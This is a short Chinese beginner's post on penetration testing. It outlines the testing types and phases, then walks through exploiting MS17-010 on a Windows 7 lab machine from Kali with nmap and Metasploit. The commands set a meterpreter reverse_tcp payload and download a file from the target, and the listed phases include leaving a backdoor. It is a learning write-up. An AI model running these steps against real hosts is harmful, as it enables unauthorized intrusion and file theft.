一丶渗透测试分类:
- 黑盒测试:不知目标内容的外部测试 难度较高
- 白盒测试:已知目标内容的内部测试 难度较低
- 灰盒测试:混合测试
二丶渗透测试流程
- 前期交互阶段:与甲方爸爸讨论测试的目的、范围、限制条件等。
- 情报搜集阶段:获取目标的系统配置、安全防护等信息。通过公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。
- 威胁建模阶段:对目标攻击的规划
- 漏洞分析:分析信息寻找切入点
- 渗透攻击阶段:找出漏洞并进行攻击,获得系统访问控制权
- 后渗透攻击阶段:擦屁股、留下后门
- 报告阶段:总结问题交给甲方爸爸
三丶本次用到的渗透术语
Metasploit:
- ping:确定与目标主机建立联系
- nmap:查看目标主机开放端口
- payload:建立与目标主机的稳定链接
四丶复现过程
环境:
攻击机:kali-Linux-2021
目标机:win7
-
通过nmap扫面目标机开放端口
nmap ***.***.***.***
2.启动Metasploit
(启动时间可能有点长,但是结果非常有趣)
msfconsole
3.通过search查找漏洞
search ms17-010
4.确定与目标主机的连接,运用搜索出的漏洞
(编码可能不同)
use 3
查看所需条件
show options
补全条件 显示缺少rhosts,并运行
set rhost ***.***.***.***
5、使用攻击模块0,并设置攻击负载
use 0
set playload windows/x64/meterpreter/reverse_tcp
6、同4
7、运行指令当出现时代表成功
8、上传或下载文件
upload/download
以下载为例
download c://11.jpeg /home/kali/Dasktop/22.jpg
我是小白如果有错的地方 希望各位大佬予以指正 不要喷我呜
